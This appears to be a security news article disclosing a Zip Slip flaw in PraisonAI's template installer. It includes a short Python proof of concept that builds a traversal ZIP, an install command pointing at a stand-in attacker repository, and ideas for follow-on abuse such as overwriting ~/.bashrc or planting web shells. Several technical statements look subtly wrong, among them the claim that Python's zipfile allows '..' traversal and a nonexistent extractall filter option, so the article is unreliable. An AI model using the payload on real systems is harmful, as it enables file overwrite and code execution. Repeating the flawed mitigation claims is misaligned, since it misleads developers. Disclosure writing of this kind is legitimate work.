PraisonAI, an open-source framework for building AI agents with YAML configurations, exposes users to arbitrary file writes through its template installation feature. Attackers can craft malicious ZIP archives hosted on GitHub that overwrite files anywhere on a victim’s filesystem during extraction. This Zip Slip vulnerability sits in the CLI code at src/praisonai/praisonai/cli/features/templates.py, line 852, where the app calls Python’s zipfile.extractall(tmpdir) without path normalization or traversal checks.
The issue stems from trusting external ZIP files without validation. Users run praisonai templates install github:repo/template, and the app downloads and extracts directly into a temp directory. A malicious archive with paths like ../../../../../../../tmp/evil.txt slips past the extraction boundary, writing files to root-owned locations if permissions allow. Python’s standard library zipfile module has offered limited protections since version 3.6—rejecting absolute paths and some malformed entries—but it does not block relative path traversals by default. PraisonAI relies on this unsafe call, making it vulnerable across Python 3.x versions.
Vulnerability Mechanics
Zip Slip, first documented in 2018 by Snyk researchers, has plagued dozens of applications from Jenkins to Apache Struts. It exploits ZIP format’s lack of path enforcement: archives store filenames as strings, and naive extractors write them verbatim. In PraisonAI, the flow is straightforward: download ZIP from GitHub, create tmpdir, extractall(). No prefix stripping, no os.path.normpath() checks, no sandboxing.
Here’s the vulnerable snippet:
zip_ref.extractall(tmpdir)
Attackers generate payloads easily:
import zipfile
with zipfile.ZipFile('malicious_template.zip', 'w') as z:
z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
Install via CLI:
$ praisonai templates install github:attacker/malicious_template
Result: /tmp/zip_slip_pwned.txt appears, confirming the write.
Real-World Impact
This hits every PraisonAI user installing community templates—common for sharing agent workflows. Overwrite ~/.bashrc to inject shell commands, corrupt Python site-packages, or drop SUID binaries for privilege escalation. On multi-user systems or servers, it enables RCE: imagine a template writing a web shell to /var/www or cron jobs. Permissions limit worst cases, but user-writable dirs like /tmp, home, or app data fall easily.
Why this matters in 2024: AI agent tools like PraisonAI explode in popularity, with GitHub repos racking up thousands of stars and forks. Community templates drive adoption, mimicking npm or PyPI ecosystems, but without supply chain safeguards. PraisonAI’s 1k+ stars (as of last check) mean widespread exposure. Similar slips hit tools like Poetry (fixed 2020) and pip (mitigated via safe extraction). Attackers phish via Discord, Twitter, or fake repos—github:awesome-ai-agents/cool-template hides malice.
Skeptically, PraisonAI’s maintainers could fix this in hours: wrap extraction in a safe function. Libraries like zipfile36 or custom filters using ZipFile.extractall(filterfunc=safe_extract) (Python 3.11+) block traversals. Until patched—check latest release—avoid untrusted templates. Verify ZIP contents manually or use air-gapped extraction.
Broad implications: In crypto and security circles, we see this as a supply chain red flag. AI frameworks pull external code routinely; one bad ZIP equals persistence. Users: Audit templates, run in containers (Docker isolates tmpdir), or disable feature. Devs: Normalize paths, use pathtrav or safeextract libs. This isn’t novel, but unpatched in active projects? Sloppy. Scan your deps—zipfile vulns persist because extraction feels “safe enough.”
Bottom line: Pause template installs. Fork and patch if needed. In a world of AI hype, basic file hygiene separates toys from tools.